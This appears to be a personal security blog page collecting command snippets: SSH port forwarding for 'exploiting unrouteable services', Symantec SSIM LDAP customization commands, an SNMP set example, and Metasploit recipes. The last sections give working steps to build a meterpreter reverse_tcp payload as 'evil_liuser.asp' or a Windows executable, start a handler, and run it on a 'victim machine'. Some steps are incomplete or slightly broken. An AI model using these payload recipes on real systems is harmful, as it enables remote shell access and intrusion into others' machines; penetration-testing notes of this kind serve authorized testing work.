$ssh -l liuser -R 445:10.2.2.50:445 192.168.10.88Confirm with netstat -nat for listening port.
Commonly used for exploiting unrouteable services.
Symantec Security Information Manager (SSIM) LDAP Mods
Symantec does not recommend customizing the LDAP tree. It is not included in Symantec's Technical Support contract.
However, I find there are a slew of things you customize which are nice features that I wish Symantec included. For example automating updates to user look up tables, auto-import of users, failover settings, etc. These attributes are all stored in the LDAP tree.
Mod at your own risk:
Port 636 (SSL)
Protocol LDAP v3
USERID=Administrator,ou=People,DC=[your_domain],O=SYMC_SES
LDAP Search using objectClass=* as a filter locally on the SSIM:
$ldapsearch -h localhost -Z -K /etc/symantec/ses/key.kdb -b "o=symc_ses" -D 'USERID=Administrator,ou=People,DC=[your_domain],O=SYMC_SES' -w [admin_password]" "objectClass=*"
Jxplorer is a nice tool for LDAP browsing SSIM. You may see some fields storing XML (for example symcMetaData for the userlook up tables). These fields need to be base64 encoded prior to setting the attribute.
Modifying look up tables for example:
ldapsearch -h localhost -Z -K /etc/symantec/ses/key.kdb -b "cn=Lookup Tables,cn=Rule Engine,cn=SIM,ou=Administration,dc=[DOMAIN],o=symc_ses" -D 'USERID=Administrator,ou=People,DC=[DOMAIN],O=SYMC_SES' -w [PASSWORD] "dlmCaption=[TABLE_NAME]"
This is the ldif I am importing:
To get the resulting table:
You also need to modify the LDAP attribute symcSequenceRevision with an updated timestamp. This time stamp is in Zulu time format. If you do not update this, then the table will not be updated.
SNMP Set Example command
Following command will set the "sysContact.o" attribute to Novacoast
$snmpset -v2c -c private [target_machine] SNMPv2-MIB::sysContact.0 s Novacoast
SNMPv2-MIB::sysContact.0 = STRING: Novacoast
Re-query to check the set was successful:
$ snmpwalk -v2c -c private [target_machine] | grep sysContact
SNMPv2-MIB::sysContact.0 = STRING: Novacoast
Metasploit Meterpreter Evil ASP
ASP:
./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] R | msfencode -o evil_liuser.asp
$msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST [localhost_ip]
msf > exploit
Execute evil_liuser.asp via browser.
Metasploit Meterpreter Windows Executable Payload
Creating the payload executable:
$msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > LHOST [localhost_ip]
msf > exploit
Run metyay.exe on victim machine.
Subscribe to:
Posts (Atom)